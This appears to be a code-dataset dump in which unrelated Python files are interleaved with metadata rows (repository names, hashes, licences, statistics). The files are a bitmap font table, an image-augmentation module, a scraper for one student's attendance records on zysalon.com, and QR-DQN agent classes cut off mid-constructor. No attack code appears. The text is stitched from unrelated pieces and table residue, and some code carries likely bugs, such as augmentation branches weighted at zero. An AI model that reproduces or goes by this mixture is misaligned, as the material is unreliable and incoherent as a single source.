    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0],
    [17, 4, 23, 9]]
# Header layout: pixel width, pixel height, byte height, pixel stride,
# colon stride.
# 5x7 column-major font, one 5-byte column list per glyph after the header.
# NOTE(review): the 36 glyph rows appear to be the digits 0-9 followed by
# A-Z (0x3e,0x51,0x49,0x45,0x3e is the classic 5x7 '0') — confirm against
# the code that indexes this table.
fiveBySevenFullset = [[5, 7, 1, 6, 0],
    [0x3e, 0x51, 0x49, 0x45, 0x3e],
    [0x0, 0x42, 0x7f, 0x40, 0x0],
    [0x42, 0x61, 0x51, 0x49, 0x46],
    [0x21, 0x41, 0x45, 0x4b, 0x31],
    [0x18, 0x14, 0x12, 0x7f, 0x10],
    [0x27, 0x45, 0x45, 0x45, 0x39],
    [0x3c, 0x4a, 0x49, 0x49, 0x30],
    [0x1, 0x71, 0x9, 0x5, 0x3],
    [0x36, 0x49, 0x49, 0x49, 0x36],
    [0x6, 0x49, 0x49, 0x29, 0x1e],
    [0x7e, 0x11, 0x11, 0x11, 0x7e],
    [0x7f, 0x49, 0x49, 0x49, 0x36],
    [0x3e, 0x41, 0x41, 0x41, 0x22],
    [0x7f, 0x41, 0x41, 0x41, 0x3e],
    [0x7f, 0x49, 0x49, 0x49, 0x41],
    [0x7f, 0x9, 0x9, 0x9, 0x1],
    [0x3e, 0x41, 0x49, 0x49, 0x7a],
    [0x7f, 0x8, 0x8, 0x8, 0x7f],
    [0x0, 0x41, 0x7f, 0x41, 0x0],
    [0x20, 0x40, 0x41, 0x3f, 0x1],
    [0x7f, 0x8, 0x14, 0x22, 0x41],
    [0x7f, 0x40, 0x40, 0x40, 0x40],
    [0x7f, 0x2, 0xc, 0x2, 0x7f],
    [0x7f, 0x4, 0x8, 0x10, 0x7f],
    [0x3e, 0x41, 0x41, 0x41, 0x3e],
    [0x7f, 0x9, 0x9, 0x9, 0x6],
    [0x3e, 0x41, 0x51, 0x21, 0x5e],
    [0x7f, 0x9, 0x19, 0x29, 0x46],
    [0x46, 0x49, 0x49, 0x49, 0x31],
    [0x1, 0x1, 0x7f, 0x1, 0x1],
    [0x3f, 0x40, 0x40, 0x40, 0x3f],
    [0x1f, 0x20, 0x40, 0x20, 0x1f],
    [0x3f, 0x40, 0x38, 0x40, 0x3f],
    [0x63, 0x14, 0x8, 0x14, 0x63],
    [0x7, 0x8, 0x70, 0x8, 0x7],
    [0x61, 0x51, 0x49, 0x45, 0x43]]
# 7x9 font with the same header layout as fiveBySevenFullset:
# [pixel width, pixel height, byte height, pixel stride, colon stride].
# Each glyph row holds 7 columns x 2 bytes per column (byte height 2).
# NOTE(review): the 10 glyph rows presumably cover the digits 0-9 —
# confirm against the code that indexes this table.
sevenByNine = [[7, 9, 2, 8, 0],
    [0xfe, 0xff, 0x21, 0x11, 0x9, 0xff, 0xfe, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
    [0x0, 0x4, 0xff, 0xff, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
    [0x2, 0x83, 0xc1, 0x61, 0x31, 0x1f, 0xe, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1],
    [0x82, 0x83, 0x1, 0x11, 0x11, 0xff, 0xee, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
    [0x30, 0x38, 0x2c, 0x26, 0xff, 0xff, 0x20, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x0],
    [0x8f, 0x8f, 0x9, 0x9, 0x9, 0xf9, 0xf1, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
    [0xfe, 0xff, 0x9, 0x9, 0x9, 0xfb, 0xf2, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
    [0x1, 0xe1, 0xf1, 0x19, 0xd, 0x7, 0x3, 0x0, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0],
    [0xee, 0xff, 0x11, 0x11, 0x11, 0xff, 0xee, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
    [0x9e, 0xbf, 0x21, 0x21, 0x21, 0xff, 0xfe, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0]]
| 86.842553
| 114
| 0.503381
| 2,936
| 20,408
| 3.498978
| 0.043937
| 0.396574
| 0.500243
| 0.560693
| 0.886401
| 0.877251
| 0.859048
| 0.85496
| 0.833739
| 0.802492
| 0
| 0.432622
| 0.343297
| 20,408
| 234
| 115
| 87.213675
| 0.333905
| 0.003234
| 0
| 0.350877
| 0
| 0
| 0
| 0
| 0
| 0
| 0.502885
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
928dce585914fd91a7df511966e94543097b1404
| 148
|
py
|
Python
|
src/__init__.py
|
kei1107/G-calendar
|
7e67b62a3313e96f227b2145e982e21bd9f1a90d
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
kei1107/G-calendar
|
7e67b62a3313e96f227b2145e982e21bd9f1a90d
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
kei1107/G-calendar
|
7e67b62a3313e96f227b2145e982e21bd9f1a90d
|
[
"MIT"
] | null | null | null |
from . import Setup_Logger
from . import Setup_Config
from . import Get_Credentials
from . import AccessGymReservationSystem
from . import CreateApi
| 29.6
| 40
| 0.837838
| 18
| 148
| 6.722222
| 0.5
| 0.413223
| 0.247934
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128378
| 148
| 5
| 41
| 29.6
| 0.937985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b7f96d855f9bbfceeea4981b541f3f33d709e0e
| 7,585
|
py
|
Python
|
src/data/transform.py
|
DIAGNijmegen/pathology-artifact-detection
|
ec614ad74ae161e839fe24ccb23fe98fcbb27cde
|
[
"Apache-2.0"
] | 6
|
2021-05-26T08:22:42.000Z
|
2022-03-07T09:45:30.000Z
|
src/data/transform.py
|
DIAGNijmegen/pathology-artifact-detection
|
ec614ad74ae161e839fe24ccb23fe98fcbb27cde
|
[
"Apache-2.0"
] | 1
|
2021-10-05T06:32:55.000Z
|
2021-10-05T06:32:55.000Z
|
src/data/transform.py
|
DIAGNijmegen/pathology-artifact-detection
|
ec614ad74ae161e839fe24ccb23fe98fcbb27cde
|
[
"Apache-2.0"
] | 1
|
2021-09-13T20:24:18.000Z
|
2021-09-13T20:24:18.000Z
|
import numpy as np
import albumentations as A
def load_train_transform(transform_type, patch_size=512):
    """Build an albumentations training-augmentation pipeline.

    Args:
        transform_type: one of 'basic', 'light', 'medium', 'moderate',
            'artifact'; any other value falls through to padding only.
        patch_size: side length (pixels) used for padding and for the
            output size of the resized crops.

    Returns:
        An ``A.Compose`` pipeline applying image (and mask) transforms.
    """
    if transform_type == 'basic':
        # Geometric-only augmentation: flips/rotations plus padding.
        transform = A.Compose([
            A.RandomRotate90(p=0.75),
            A.HorizontalFlip(p=0.5),
            A.VerticalFlip(p=0.5),
            A.PadIfNeeded(patch_size, patch_size)])
    elif transform_type == 'light':
        transform = A.Compose([
            # rotate image
            A.RandomRotate90(p=0.75),
            A.HorizontalFlip(p=0.5),
            A.VerticalFlip(p=0.5),
            A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
            # apply random resized crop
            A.RandomSizedCrop(min_max_height=(256, 768), height=patch_size, width=patch_size, interpolation=2, p=1.0),
            A.PadIfNeeded(patch_size, patch_size),
            # mild color jitter (value channel untouched)
            A.HueSaturationValue(
                hue_shift_limit=10,
                sat_shift_limit=10,
                val_shift_limit=0,
                p=0.5),
            A.OneOf([
                A.RandomBrightnessContrast(brightness_limit=0.15, contrast_limit=0.0, p=1.0),
                A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.15, p=1.0),
                # NOTE(review): p=.0 gives this option zero selection weight
                # inside OneOf (dead branch) — likely a typo (cf. p=0.5 in
                # 'medium'); confirm intended probability.
                A.RandomGamma(p=.0)], p=1.0),
            A.PadIfNeeded(patch_size, patch_size)])
    elif transform_type == 'medium':
        transform = A.Compose([
            # rotate image
            A.RandomRotate90(p=0.75),
            A.HorizontalFlip(p=0.5),
            A.VerticalFlip(p=0.5),
            A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
            # apply random resized crop
            A.RandomSizedCrop(min_max_height=(256, 768), height=patch_size, width=patch_size, interpolation=2, p=1.0),
            A.PadIfNeeded(patch_size, patch_size),
            # stronger photometric noise than 'light'
            A.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2, p=0.1),
            A.CoarseDropout(max_holes=12, max_height=12, max_width=12, fill_value=0, p=0.25),
            A.RandomResizedCrop(patch_size, patch_size, scale=(0.5, 1.5), ratio=(0.5, 1.5), interpolation=1, p=0.5),
            A.RGBShift(r_shift_limit=20, g_shift_limit=20, b_shift_limit=20, p=0.5),
            A.HueSaturationValue(
                hue_shift_limit=20,
                sat_shift_limit=20,
                val_shift_limit=5,
                p=0.5),
            A.OneOf([
                A.RandomBrightnessContrast(brightness_limit=0.4, contrast_limit=0.0, p=0.75),
                A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.2, p=0.75),
                A.RandomGamma(gamma_limit=(75, 125), p=0.5)], p=1.0),
            # contrast-enhancement / sharpening / compression artifacts
            A.OneOf([
                A.CLAHE(clip_limit=2.0, tile_grid_size=(8, 8), p=0.75),
                A.IAASharpen(alpha=(0.2, 0.5), lightness=(0.5, 1.0), p=0.75),
                A.ImageCompression(quality_lower=60, quality_upper=100, compression_type=0, p=0.75)], p=1.0),
            ])
    elif transform_type == 'moderate':
        transform = A.Compose([
            # rotate image
            A.RandomRotate90(p=0.75),
            A.HorizontalFlip(p=0.5),
            A.VerticalFlip(p=0.5),
            A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
            # apply random resized crop
            A.RandomSizedCrop(min_max_height=(256, 768), height=patch_size, width=patch_size, interpolation=2, p=1.0),
            A.PadIfNeeded(patch_size, patch_size),
            A.OneOf([
                A.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2, p=1.0),
                A.CoarseDropout(max_holes=8, max_height=20, max_width=20, fill_value=0, p=1.0)], p=0.25),
            A.OneOf([
                A.RGBShift(
                    r_shift_limit=20,
                    g_shift_limit=20,
                    b_shift_limit=20,
                    p=1.0),
                A.HueSaturationValue(
                    hue_shift_limit=20,
                    sat_shift_limit=20,
                    val_shift_limit=10,
                    p=1.0)], p=0.5),
            A.OneOf([
                A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.0, p=1.0),
                A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.2, p=1.0),
                # NOTE(review): p=.0 makes this branch dead inside OneOf —
                # likely a typo; confirm intent.
                A.RandomGamma(p=.0)], p=0.5),
            # spatial warping (applied to image and mask alike)
            A.OneOf([
                A.ElasticTransform(
                    alpha=200,
                    sigma=20,
                    alpha_affine=20,
                    interpolation=1,
                    border_mode=0,
                    value=0,
                    mask_value=0,
                    p=1.0),
                A.GridDistortion(
                    num_steps=10,
                    distort_limit=0.3,
                    interpolation=1,
                    border_mode=0,
                    value=0,
                    mask_value=0,
                    p=1.0)], p=0.5),
            A.OneOf([
                A.CLAHE(clip_limit=2.0, tile_grid_size=(8, 8), p=1.0),
                A.IAASharpen(alpha=(0.2, 0.5), lightness=(0.5, 1.0), p=1.0),
                A.ImageCompression(quality_lower=60, quality_upper=100, compression_type=0, p=1.0)], p=0.5),
            ])
    elif transform_type == 'artifact':
        # Same as 'moderate' but without the random resized crop; padding
        # is applied at the end of the pipeline instead.
        transform = A.Compose([
            # rotate image
            A.RandomRotate90(p=0.75),
            A.HorizontalFlip(p=0.5),
            A.VerticalFlip(p=0.5),
            A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
            A.OneOf([
                A.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2, p=1.0),
                A.CoarseDropout(max_holes=8, max_height=20, max_width=20, fill_value=0, p=1.0)], p=0.25),
            A.OneOf([
                A.RGBShift(
                    r_shift_limit=20,
                    g_shift_limit=20,
                    b_shift_limit=20,
                    p=1.0),
                A.HueSaturationValue(
                    hue_shift_limit=20,
                    sat_shift_limit=20,
                    val_shift_limit=10,
                    p=1.0)], p=0.5),
            A.OneOf([
                A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.0, p=1.0),
                A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.2, p=1.0),
                # NOTE(review): p=.0 makes this branch dead inside OneOf —
                # likely a typo; confirm intent.
                A.RandomGamma(p=.0)], p=0.5),
            A.OneOf([
                A.ElasticTransform(
                    alpha=200,
                    sigma=20,
                    alpha_affine=20,
                    interpolation=1,
                    border_mode=0,
                    value=0,
                    mask_value=0,
                    p=1.0),
                A.GridDistortion(
                    num_steps=10,
                    distort_limit=0.3,
                    interpolation=1,
                    border_mode=0,
                    value=0,
                    mask_value=0,
                    p=1.0)], p=0.5),
            A.OneOf([
                A.CLAHE(clip_limit=2.0, tile_grid_size=(8, 8), p=1.0),
                A.IAASharpen(alpha=(0.2, 0.5), lightness=(0.5, 1.0), p=1.0),
                A.ImageCompression(quality_lower=60, quality_upper=100, compression_type=0, p=1.0)], p=0.5),
            A.PadIfNeeded(patch_size, patch_size)
            ])
    else:
        # Unknown type: no augmentation, padding only.
        transform = A.Compose([A.PadIfNeeded(patch_size, patch_size)])
    return transform
def load_valid_transform(patch_size=768):
    """Validation-time pipeline: pad patches up to *patch_size* only."""
    pad_only = [A.PadIfNeeded(patch_size, patch_size)]
    return A.Compose(pad_only)
| 39.097938
| 118
| 0.51325
| 985
| 7,585
| 3.796954
| 0.111675
| 0.023529
| 0.024064
| 0.02246
| 0.878877
| 0.864706
| 0.861765
| 0.861765
| 0.836898
| 0.803209
| 0
| 0.091619
| 0.358207
| 7,585
| 193
| 119
| 39.300518
| 0.676664
| 0.017007
| 0
| 0.8
| 0
| 0
| 0.004296
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012903
| false
| 0
| 0.012903
| 0.006452
| 0.03871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ba11a900136c4231565c77b4e5aaa43c8bca533
| 1,604
|
py
|
Python
|
getZyIns.py
|
walotta/wBot
|
2bdab2d308b0d7599cf4b788b2839680795d19d7
|
[
"MIT"
] | null | null | null |
getZyIns.py
|
walotta/wBot
|
2bdab2d308b0d7599cf4b788b2839680795d19d7
|
[
"MIT"
] | null | null | null |
getZyIns.py
|
walotta/wBot
|
2bdab2d308b0d7599cf4b788b2839680795d19d7
|
[
"MIT"
] | null | null | null |
import requests
from bs4 import BeautifulSoup
import re
# ret: [学生学号], [参加总次数], [沙龙次数], [院系讲座次数]
def getInfo(studentId):
    """Fetch attendance counts for *studentId* from zysalon.com.

    Scrapes the result page and extracts the numbers from the first and
    third children of the first <p> tag.

    Returns:
        (1, info) on success, where info is a list of ints whose first
        element is the student id; (0, message) on failure.
    """
    try:
        url = 'https://zysalon.com/result?id={}'.format(studentId)
        html = requests.get(url)
        soup = BeautifulSoup(html.text, 'html.parser')
        # Only the 1st and 3rd children of the first <p> carry the
        # numeric summary text (original code kept indices 0 and 2).
        msg = [str(child) for idx, child in enumerate(soup.p.children)
               if idx in (0, 2)]
        # Pull every number out of the collected fragments.
        info = [int(num) for m in msg
                for num in re.findall(r"\d+\.?\d*", m)]
        if str(info[0]) != str(studentId):
            return 0, 'url student number not fit'
        else:
            return 1, info
    except Exception:
        # Network failure, unexpected markup, or unparsable numbers.
        # (Was a bare `except:`, which also swallowed KeyboardInterrupt.)
        return 0, 'error occur'
def getDetail(studentId):
    """Fetch attendance counts plus per-event details for *studentId*.

    Same scraping as getInfo, but additionally collects the text of each
    <li> entry in the first <ul> on the page.

    Returns:
        (1, info, detail) on success; (0, message) on failure.
    """
    try:
        url = 'https://zysalon.com/result?id={}'.format(studentId)
        html = requests.get(url)
        soup = BeautifulSoup(html.text, 'html.parser')
        # Only the 1st and 3rd children of the first <p> carry the
        # numeric summary text (original code kept indices 0 and 2).
        msg = [str(child) for idx, child in enumerate(soup.p.children)
               if idx in (0, 2)]
        # Every odd-indexed child of the first <ul> is an <li>; strip the
        # "<li>"/"</li>" wrapper (4 and 5 characters) to get its text.
        detail = [str(child)[4:-5] for idx, child in enumerate(soup.ul.children)
                  if idx % 2 == 1]
        # Pull every number out of the collected fragments.
        info = [int(num) for m in msg
                for num in re.findall(r"\d+\.?\d*", m)]
        if str(info[0]) != str(studentId):
            return 0, 'url student number not fit'
        else:
            return 1, info, detail
    except Exception:
        # Network failure, unexpected markup, or unparsable numbers.
        # (Was a bare `except:`, which also swallowed KeyboardInterrupt.)
        return 0, 'error occur'
| 27.186441
| 64
| 0.498753
| 213
| 1,604
| 3.755869
| 0.29108
| 0.01875
| 0.0225
| 0.04125
| 0.8225
| 0.765
| 0.74375
| 0.74375
| 0.74375
| 0.74375
| 0
| 0.022461
| 0.361596
| 1,604
| 58
| 65
| 27.655172
| 0.758789
| 0.023691
| 0
| 0.792453
| 0
| 0
| 0.113811
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.056604
| 0
| 0.207547
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bbb3c16999f654909e09e3793e703933d97c281
| 15,168
|
py
|
Python
|
deep_rl/agent/others/QuantileRegressionDQN_agent.py
|
DMIU-ShELL/deeprl-shell
|
a7845ab1c4967ba2af9486625086c3d0b176d293
|
[
"Apache-2.0"
] | null | null | null |
deep_rl/agent/others/QuantileRegressionDQN_agent.py
|
DMIU-ShELL/deeprl-shell
|
a7845ab1c4967ba2af9486625086c3d0b176d293
|
[
"Apache-2.0"
] | null | null | null |
deep_rl/agent/others/QuantileRegressionDQN_agent.py
|
DMIU-ShELL/deeprl-shell
|
a7845ab1c4967ba2af9486625086c3d0b176d293
|
[
"Apache-2.0"
] | null | null | null |
#######################################################################
# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from ...network import *
from ...component import *
from ...utils import *
import time
from ..BaseAgent import *
class QuantileRegressionDQNAgent_mod(BaseAgent):
    """QR-DQN agent variant whose network receives, alongside the current
    state, an exponential-moving-average "memory" of past observations.

    Differs from QuantileRegressionDQNAgent below in that predict() is
    called with (state, memory) pairs and the replay buffer stores the
    memory with each transition.
    """
    def __init__(self, config):
        # Build task, online/target networks, optimizer, replay buffer and
        # exploration policy from the factory functions on `config`.
        BaseAgent.__init__(self, config)
        self.config = config
        self.task = config.task_fn()
        self.network = config.network_fn(self.task.state_dim, self.task.action_dim)
        self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)
        self.optimizer = config.optimizer_fn(self.network.parameters())
        self.criterion = nn.MSELoss()
        # Start the target network in sync with the online network.
        self.target_network.load_state_dict(self.network.state_dict())
        self.replay = config.replay_fn()
        self.policy = config.policy_fn()
        self.total_steps = 0
        # Uniform weight used to collapse quantile values to a scalar Q.
        self.quantile_weight = 1.0 / self.config.num_quantiles
        # Quantile midpoints tau_hat_i = (2i + 1) / (2N), used in the
        # quantile-regression loss below.
        self.cumulative_density = tensor(
            (2 * np.arange(self.config.num_quantiles) + 1) / (2.0 * self.config.num_quantiles))
        # EMA coefficient for the observation memory maintained in episode().
        self.mem_update_rate = 0.1;
    def huber(self, x):
        """Element-wise Huber loss with threshold 1 (no reduction)."""
        cond = (x.abs() < 1.0).float().detach()
        return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1 - cond)
    def evaluation_action(self, state, x_mem):
        """Greedy action for (state, x_mem): mean over quantiles, then argmax."""
        value = self.network.predict(np.stack([self.config.state_normalizer(state)]), np.stack([self.config.state_normalizer(x_mem)])).squeeze(0).detach()
        value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
        return np.argmax(value)
    def episode(self, deterministic=False):
        """Run one episode and return (total_reward, steps).

        With deterministic=True the agent acts greedily and neither stores
        transitions nor learns.
        """
        episode_start_time = time.time()
        state = self.task.reset()
        memory = np.asarray(state)
        total_reward = 0.0
        steps = 0
        while True:
            # memory = np.asarray((1-self.mem_update_rate)*memory+self.mem_update_rate*np.asarray(state))
            # Exponential moving average of observations, kept as uint8.
            memory = (np.multiply(1-self.mem_update_rate,memory)+np.multiply(self.mem_update_rate,np.asarray(state))).astype(np.uint8)
            # Quantile predictions -> scalar Q-values via the uniform mean.
            value = self.network.predict(np.stack([self.config.state_normalizer(state)]),np.stack([self.config.state_normalizer(memory)])).squeeze(0).detach()
            value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
            if deterministic:
                action = np.argmax(value)
            elif self.total_steps < self.config.exploration_steps:
                # Pure random exploration during warm-up.
                action = np.random.randint(0, len(value))
            else:
                action = self.policy.sample(value)
            next_state, reward, done, _ = self.task.step(action)
            total_reward += reward
            reward = self.config.reward_normalizer(reward)
            if not deterministic:
                self.replay.feed([state, memory, action, reward, next_state, int(done)])
                self.total_steps += 1
            steps += 1
            state = next_state
            if not deterministic and self.total_steps > self.config.exploration_steps \
                    and self.total_steps % self.config.sgd_update_frequency == 0:
                experiences = self.replay.sample()
                states, memories, actions, rewards, next_states, terminals = experiences
                states = self.config.state_normalizer(states)
                next_states = self.config.state_normalizer(next_states)
                memories = self.config.state_normalizer(memories)
                # Target quantiles for the greedy next action.
                quantiles_next = self.target_network.predict(next_states,memories).detach()
                q_next = (quantiles_next * self.quantile_weight).sum(-1)
                _, a_next = torch.max(q_next, dim=1)
                a_next = a_next.view(-1, 1, 1).expand(-1, -1, quantiles_next.size(2))
                quantiles_next = quantiles_next.gather(1, a_next).squeeze(1)
                rewards = tensor(rewards)
                terminals = tensor(terminals)
                # Bellman backup applied to every target quantile.
                quantiles_next = rewards.view(-1, 1) + self.config.discount * (1 - terminals.view(-1, 1)) * quantiles_next
                quantiles = self.network.predict(states,memories)
                actions = tensor(actions).long()
                actions = actions.view(-1, 1, 1).expand(-1, -1, quantiles.size(2))
                quantiles = quantiles.gather(1, actions).squeeze(1)
                quantiles_next = quantiles_next.t().unsqueeze(-1)
                diff = quantiles_next - quantiles
                # Quantile-regression Huber loss weighted by |tau - 1{diff<0}|.
                loss = self.huber(diff) * (self.cumulative_density.view(1, -1) - (diff.detach() < 0).float()).abs()
                self.optimizer.zero_grad()
                loss.mean(0).mean(1).sum().backward()
                self.optimizer.step()
                self.evaluate()
            # Periodically sync the target network with the online network.
            if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
                self.target_network.load_state_dict(self.network.state_dict())
            if not deterministic and self.total_steps > self.config.exploration_steps:
                self.policy.update_epsilon()
            if done:
                break
        episode_time = time.time() - episode_start_time
        self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
                                 (steps, episode_time, episode_time / float(steps)))
        return total_reward, steps
class QuantileRegressionDQNAgent_mod_surp(BaseAgent):
    """QR-DQN agent variant that feeds the network the "surprise" signal
    novel_x = state - memory (the residual between the current state and
    an exponential-moving-average memory of past observations).

    Identical to QuantileRegressionDQNAgent_mod except that novel_x,
    rather than the memory itself, is passed to predict() and stored in
    the replay buffer.
    """
    def __init__(self, config):
        # Build task, online/target networks, optimizer, replay buffer and
        # exploration policy from the factory functions on `config`.
        BaseAgent.__init__(self, config)
        self.config = config
        self.task = config.task_fn()
        self.network = config.network_fn(self.task.state_dim, self.task.action_dim)
        self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)
        self.optimizer = config.optimizer_fn(self.network.parameters())
        self.criterion = nn.MSELoss()
        # Start the target network in sync with the online network.
        self.target_network.load_state_dict(self.network.state_dict())
        self.replay = config.replay_fn()
        self.policy = config.policy_fn()
        self.total_steps = 0
        # Uniform weight used to collapse quantile values to a scalar Q.
        self.quantile_weight = 1.0 / self.config.num_quantiles
        # Quantile midpoints tau_hat_i = (2i + 1) / (2N).
        self.cumulative_density = tensor(
            (2 * np.arange(self.config.num_quantiles) + 1) / (2.0 * self.config.num_quantiles))
        # EMA coefficient for the observation memory maintained in episode().
        self.mem_update_rate = 0.1;
    def huber(self, x):
        """Element-wise Huber loss with threshold 1 (no reduction)."""
        cond = (x.abs() < 1.0).float().detach()
        return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1 - cond)
    def evaluation_action(self, state, x_mem):
        """Greedy action for (state, x_mem): mean over quantiles, then argmax."""
        value = self.network.predict(np.stack([self.config.state_normalizer(state)]), np.stack([self.config.state_normalizer(x_mem)])).squeeze(0).detach()
        value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
        return np.argmax(value)
    def episode(self, deterministic=False):
        """Run one episode and return (total_reward, steps).

        With deterministic=True the agent acts greedily and neither stores
        transitions nor learns.
        """
        episode_start_time = time.time()
        state = self.task.reset()
        memory = np.asarray(state)
        total_reward = 0.0
        steps = 0
        while True:
            # Exponential moving average of observations, kept as uint8.
            memory = (np.multiply(1-self.mem_update_rate,memory)+np.multiply(self.mem_update_rate,np.asarray(state))).astype(np.uint8)
            # Surprise signal: deviation of the current state from memory.
            novel_x = state - memory
            value = self.network.predict(np.stack([self.config.state_normalizer(state)]),np.stack([self.config.state_normalizer(novel_x)])).squeeze(0).detach()
            value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
            if deterministic:
                action = np.argmax(value)
            elif self.total_steps < self.config.exploration_steps:
                # Pure random exploration during warm-up.
                action = np.random.randint(0, len(value))
            else:
                action = self.policy.sample(value)
            next_state, reward, done, _ = self.task.step(action)
            total_reward += reward
            reward = self.config.reward_normalizer(reward)
            if not deterministic:
                self.replay.feed([state, novel_x, action, reward, next_state, int(done)])
                self.total_steps += 1
            steps += 1
            state = next_state
            if not deterministic and self.total_steps > self.config.exploration_steps \
                    and self.total_steps % self.config.sgd_update_frequency == 0:
                experiences = self.replay.sample()
                states, novel_xs, actions, rewards, next_states, terminals = experiences
                states = self.config.state_normalizer(states)
                next_states = self.config.state_normalizer(next_states)
                novel_xs = self.config.state_normalizer(novel_xs)
                # Target quantiles for the greedy next action.
                quantiles_next = self.target_network.predict(next_states,novel_xs).detach()
                q_next = (quantiles_next * self.quantile_weight).sum(-1)
                _, a_next = torch.max(q_next, dim=1)
                a_next = a_next.view(-1, 1, 1).expand(-1, -1, quantiles_next.size(2))
                quantiles_next = quantiles_next.gather(1, a_next).squeeze(1)
                rewards = tensor(rewards)
                terminals = tensor(terminals)
                # Bellman backup applied to every target quantile.
                quantiles_next = rewards.view(-1, 1) + self.config.discount * (1 - terminals.view(-1, 1)) * quantiles_next
                quantiles = self.network.predict(states,novel_xs)
                actions = tensor(actions).long()
                actions = actions.view(-1, 1, 1).expand(-1, -1, quantiles.size(2))
                quantiles = quantiles.gather(1, actions).squeeze(1)
                quantiles_next = quantiles_next.t().unsqueeze(-1)
                diff = quantiles_next - quantiles
                # Quantile-regression Huber loss weighted by |tau - 1{diff<0}|.
                loss = self.huber(diff) * (self.cumulative_density.view(1, -1) - (diff.detach() < 0).float()).abs()
                self.optimizer.zero_grad()
                loss.mean(0).mean(1).sum().backward()
                self.optimizer.step()
                self.evaluate()
            # Periodically sync the target network with the online network.
            if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
                self.target_network.load_state_dict(self.network.state_dict())
            if not deterministic and self.total_steps > self.config.exploration_steps:
                self.policy.update_epsilon()
            if done:
                break
        episode_time = time.time() - episode_start_time
        self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
                                 (steps, episode_time, episode_time / float(steps)))
        return total_reward, steps
class QuantileRegressionDQNAgent(BaseAgent):
    """Standard QR-DQN agent: the network predicts a distribution of
    num_quantiles values per action; the scalar Q-value is their uniform
    mean, and training minimizes the quantile-regression Huber loss.
    """
    def __init__(self, config):
        # Build task, online/target networks, optimizer, replay buffer and
        # exploration policy from the factory functions on `config`.
        BaseAgent.__init__(self, config)
        self.config = config
        self.task = config.task_fn()
        self.network = config.network_fn(self.task.state_dim, self.task.action_dim)
        self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)
        self.optimizer = config.optimizer_fn(self.network.parameters())
